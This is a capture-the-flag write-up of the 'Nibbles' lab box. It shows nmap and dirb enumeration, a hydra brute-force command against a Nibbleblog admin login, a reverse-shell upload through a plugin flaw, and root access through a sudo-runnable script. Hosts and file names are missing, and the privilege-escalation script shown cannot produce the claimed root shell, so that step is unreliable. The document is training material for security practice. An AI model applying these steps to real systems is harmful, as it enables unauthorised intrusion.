Nibbles is an easy Linux box that can be exploited by bruteforcing the administrator’s login page. After this you can install a malicious plugin due to a file upload vulnerability. Privileges can be escalated by replacing a monitoring script which can be run with sudo rights.


Nmap discovered the following open ports and services:

nmap -sC -sV -oN fullscan -Pn

22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The first thing I checked was the webserver. The user is presented with a blank page that displays Hello world!. By checking the code (ctrl + u) it contains the following comment:

/nibbleblog/ directory. Nothing interesting here!

Naturally, you can navigate to:

Next, as usually, the website was bruteforced to discover hidden files and directories with dirb:

dirb -X .php

The results were as follows:

+ (CODE:200|SIZE:1401)   

Brute-Forcing the Login Page

Navigating here results in a login page. This can be bruteforced with hydra like this:

hydra -l admin -P /usr/share/wordlist/rockyou.txt -vV -f -t 2 http-post-form "/nibbleblog/admin.php:username=^USER^&password=^PASS^:login_error"

[ATTEMPT] target - login "admin" - pass "password" - 1 of 10000 [child 0] (0/0)
[ATTEMPT] target - login "admin" - pass "123456" - 2 of 10000 [child 1] (0/0)

Hydra shows two options. Both are incorrect however. This is probably done on purpose by showing a different error message when entering these credentials. By simply guessing you will get in with admin & nibbles. Now you are presented with a standard dashboard.


A google search showed that:

Nibbleblog contains a flaw that allows an authenticated remote attacker to execute arbitrary PHP code. This module was tested on version 4.0.3.

Go to plugins > install and you will be able to upload a picture. This upload is vulnerable and you can simply upload a reverse shell. After clicking save changes it will display some warnings. You can ignore these and continue to It will show the php file you just uploaded and when clicking it will open a reverse shell as the user nibbler. The user.txt is in the home directory of this user.

Privilege Escalation

The next step is privilege escalation. I recommend running linpeas this gives a great deal of information such as:

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/

I simply created this file:

$ cat

echo "worked"

By executing: sudo /home/nibbler/personal/stuff/ you obtain a root shell and can open root.txt